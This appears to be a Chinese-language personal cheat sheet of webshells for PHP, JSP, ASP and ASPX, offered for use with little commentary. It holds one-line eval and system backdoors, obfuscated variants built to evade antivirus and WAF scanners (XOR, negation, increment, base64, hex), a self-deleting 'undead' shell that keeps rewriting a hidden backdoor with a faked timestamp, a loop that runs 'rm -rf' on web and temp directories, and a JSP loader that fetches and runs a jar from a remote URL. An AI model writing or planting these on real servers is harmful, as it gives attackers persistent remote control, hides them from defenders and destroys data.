👴的养马场

PHP

简单一句话

<?php eval($_POST["Du1"]);phpinfo(); ?>
<?php @system($_GET["Du1"]); ?>
<?php usort($_GET,'asse'.'rt');?> // ?1=1+1&2=eval($_POST[x])

免杀

简单免杀

<?php
$a = $GLOBALS;
$str = '_POST';
eval/**nice**/(''. $a[$str]['cf87efe0c36a12aec113cd7982043573']. NULL);
?>

<?php
$a = str_replace("b", "", "absbsbebrbt");
$a($_POST['Du1']);
?>

<?php
function fun(){return $_POST['Du1'];}
@preg_replace("/test/e", fun(), "testtesttest");
?>

<?php
$a = array('a','s','e','r','t');
$b = '_GET';
($a[0].$a[1].$a[1].$a[2].$a[3].$a[4])($$b['Du1']);

<?php
$a = substr_replace("assexx","rt",4);
$b=[''=>$a($_POST['Du1'])];
?>

异或

<?php $a = (''^'`').(''^'`').(''^'`').(''^'`');$__='_'.('\''^'`').('%'^'`').('4'^'`');$___ = $$__;@eval($___['_']);?>
异或转码数据
<?php
$a = (''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(' '^'`').('
'^'`').(' '^'`').(' '^'`').('
'^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`');
$b = ('!'^'`').('"'^'`').('#'^'`').('$'^'`').('%'^'`').('&'^'`').('\''^'`').('('^'`').(')'^'`').('*'^'`').('+'^'`').(','^'`').('-'^'`').('.'^'`').('/'^'`').('0'^'`').('1'^'`').('2'^'`').('3'^'`').('4'^'`').('5'^'`').('6'^'`').('7'^'`').('8'^'`').('9'^'`').(':'^'`');
$c =(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').('
'^']').(' '^']').(''^']').(''^']').(' '^']').(''^']').(' '^']').('
'^']').(''^']').(''^']').(''^']');
echo $a;
echo $b;
echo $c;
?>

随机异或

<?php
class VONE {
function HALB() {
$rlf = 'B' ^ "\x23";
$fzq = 'D' ^ "\x37";
$fgu = 'h' ^ "\x1b";
$sbe = 'R' ^ "\x37";
$gba = 'H' ^ "\x3a";
$oya = 'Y' ^ "\x2d";
$MWUC = $rlf . $fzq . $fgu . $sbe . $gba . $oya;
return $MWUC;}function __destruct() {
$RNUJ = $this->HALB();
@$RNUJ($this->HY);
}
}
$vone = new VONE();
@$vone->HY = isset($_GET['duitu']) ? base64_decode($_POST['Du1']) : $_POST['Du1'];
?>

取反

<?php
$__=('>'>'<')+('>'>'<');
$_=$__/$__;
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);

自增

<?php
/*$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);*/


$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++; // E
$____=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // V
$____.=$__;
$____.=$___;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // L
$____.=$__;

$___='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$_=$$___;
$____($_GET['xg']); // ASSERT($_POST[_]);
?>

无数字

<?php
$_=chr(floor(pow(pi(),ceil(pi())))).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()*pi()+pi()+pi())+true)).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()*pi()+pi()+pi())+true)).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()))).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()*pi()+pi()+pi()))).chr(floor(pow(pi(),ceil(pi()))+ceil(pi()*pi()+pi())+ceil(pi())+true));
$__='_'.chr( floor(pow(ceil(pi()),pi())-ceil(pi()+true+true))).chr(floor(pow(ceil(pi()),pi())-ceil(pi()+pi())-true)).chr(floor(pow(ceil(pi()),pi())+pow(pi()-true,pi()-true)+true+true));
$___=$$__;
$_($___[_]);
?>

QQQ

<?php
/**
* Noticed: (PHP 5 >= 5.3.0, PHP 7)
* Referer: https://www.duitutu.cn/assnmsl
*/
$password = "duitutu.cn";
$bypass = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($bypass."ert", array($_REQUEST[$password]));
?>

QQQQQ

shell.php

<?php
set_time_limit(1);
ignore_user_abort(true);
$file = 'phpinfo.php';
$shell =
"PD9waHAKCSRzdHIxID0gJ2FIKFVVSChmc2RmSChVVUgoZnNkZixmZGdkZWZqZzBKKXImJUYlKl5HKnQnOwoJJHN0cjIgPSBzdHJ0cigkc3RyMSxhcnJheSgnYUgoVVVIKGZzZGZIKFVVSChmc2RmLCc9PidhcycsJ2ZkZ2RlZmpnMEopJz0+J3NlJywnciYlRiUqXkcqdCc9PidydCcpKTsKCSRzdHIzID0gc3RydHIoJHN0cjIsYXJyYXkoJ3MsJz0+J3MnLCdmZGdkZWZqZzBKKXImJUYlKl5HKic9PidlcicpKTsKCWlmKG1kNShAJF9HRVRbJ2EnXSkgPT0nZTEwYWRjMzk0OWJhNTlhYmJlNTZlMDU3ZjIwZjg4M2UnKXsKCQkkc3RyNCA9IHN0cnJldigkX1BPU1RbJ2EnXSk7CgkJJHN0cjUgPSBzdHJyZXYoJHN0cjQpOwoJCSRzdHIzKCRzdHI1KTsKICAgIH0KPz4=";
while(true){
file_put_contents($file,base64_decode($shell));
usleep(50);
}
?>

phpinfo.php

<?php

$str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t';

$str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt'));

$str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er'));

if(md5(@$_GET['a']) =='e10adc3949ba59abbe56e057f20f883e'){

$str4 = strrev($_POST['a']);

$str5 = strrev($str4);

$str3($str5);

}
// e10adc3949ba59abbe56e057f20f883e的md5解密为123456,即密码
?>

绕 waf

读取目录

<?php @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();

写🐎

<?php @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/shell.php';$c=$_POST["Du1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();

内存不死🐎

<?php
set_time_limit(0);
ignore_user_abort(true);
unlink(__FILE__);
$file = '/var/www/html/.shell.php';
//$file = 'D:\phpstudy_pro\WWW\h\.shell.php';
$code = '<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@eval($_POST[\'Du1\']);}?>';
while (1) {
file_put_contents($file, $code);
system('touch -m -d "2014-10-31 13:50:11" .shell.php');
usleep(1000);
}
?>

372a1b33f1178a24810b45076f907767

<?php

// 絕世好馬

/*

1. write .htaccess to prevent any execution from web
2. rm every thing in web dir (/tmp dir and /var/tmp dir)
3. link flag to web path

*/

ignore_user_abort(true);
set_time_limit(0);

//config
$web_path = "/var/www/html/";
$hash_1 = "93ca52b2614926880c319db1ac5b1380";
$flag_link = $web_path . '/' . $hash_1.".png";
$htaccess_file = '.htaccess';
$flag_path = "/flag";
$htaccess = '<FilesMatch ".+\.ph(p[3457]?|t|tml)$">
Deny from all
</FilesMatch>';

unlink(__FILE__);
while (TRUE) {{
system('rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/*');
$files = scandir($web_path);
$res = 'rm -rf';
foreach ($files as $file) {
if($file != '.' && $file != '..' && $file != $htaccess_file && $file != $hash_1.".png"){
$res = $res . ' ' .$file;
}
}
system($res);
if (file_get_contents($htaccess_file)!==$htaccess) {{
system('chmod +w '.$htaccess_file);
file_put_contents($htaccess_file, $htaccess);
system('chmod -w '.$htaccess_file);
}}
system('ln -s '.$flag_path.' '.$flag_link);
system('chmod -w '.$flag_link);
usleep(5);
}}
?>

JSP

执行系统命令

无回显执行系统命令

<%Runtime.getRuntime().exec(request.getParameter("Du1"));%>

有回显带密码验证

<%
if("023".equals(request.getParameter("passwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("Du1")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>

把字符串编码后写入指定文件

1.

<%new java.io.FileOutputStream(request.getParameter("file")).write(request.getParameter("str").getBytes());%>

<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("file")).write(request.getParameter("str").getBytes());%>

2.

<%new java.io.RandomAccessFile(request.getParameter("file"),"rw").write(request.getParameter("str").getBytes()); %>

<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>

下载远程文件

<%
java.io.InputStream in = new java.net.URL(request.getParameter("url")).openStream();
byte[] b = new byte[1024];
java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
int a = -1;
while ((a = in.read(b)) != -1) {
baos.write(b, 0, a);
}
new java.io.FileOutputStream(request.getParameter("file")).write(baos.toByteArray());
%>

直接下载到 web 路径下:

<%
java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
byte[] b = new byte[1024];
java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
int a = -1;
while ((a = in.read(b)) != -1) {
baos.write(b, 0, a);
}
new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray());
%>

免杀

命令执行 Jsp bypass D盾 & 百度scanner

Base64
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
BASE64Decoder decoder = new BASE64Decoder();
Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
Process e = (Process)
rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
Object[]{}), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
ASCII
<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%
if(request.getParameter("cmd")!=null){
Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }));
Process e = (Process) rt.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class).invoke(rt.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })).invoke(null), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;byte[] b = new byte[2048];out.print("<pre>");
while((a=in.read(b))!=-1){ out.println(new String(b)); }out.print("</pre>");
}
%>
HEX
<%@ page contentType="text/html;charset=UTF-8" import="javax.xml.bind.DatatypeConverter" language="java" %>
<%
if(request.getParameter("cmd")!=null){
Class rt = Class.forName(new String(DatatypeConverter.parseHexBinary("6a6176612e6c616e672e52756e74696d65")));
Process e = (Process) rt.getMethod(new String(DatatypeConverter.parseHexBinary("65786563")), String.class).invoke(rt.getMethod(new String(DatatypeConverter.parseHexBinary("67657452756e74696d65"))).invoke(null), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;byte[] b = new byte[2048];out.print("<pre>");
while((a=in.read(b))!=-1){ out.println(new String(b)); }out.print("</pre>");
}
%>

冰蝎 Jsp bypass D盾 & 百度scanner

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}
public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
<%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);
out.print(k);return;}
Cipher c=Cipher.getInstance("AES");
SecretKeySpec sec=new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES");
c.init(2,sec);
String uploadString= request.getReader().readLine();
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(uploadString))).newInstance().equals(pageContext);%>

反射调用外部 Jar

直接用了某位师傅实现了的远程加载类,改天自己搭一下吧。

<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>

使用方法:?u=http://javaweb.org/Cat.jar&023=A

大🐎

太大了,不好放,丢自己本地了

ASP

一句话

<%eval request("_")%>
<%execute(request("Du1"))%>

一些简单Bypass

<%a=request("Du1")%><%eval a%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("Du1"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"1"&"-"&"1"&")"&")")%> // 密码:-2

ASPX

一句话

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"Du1"));%>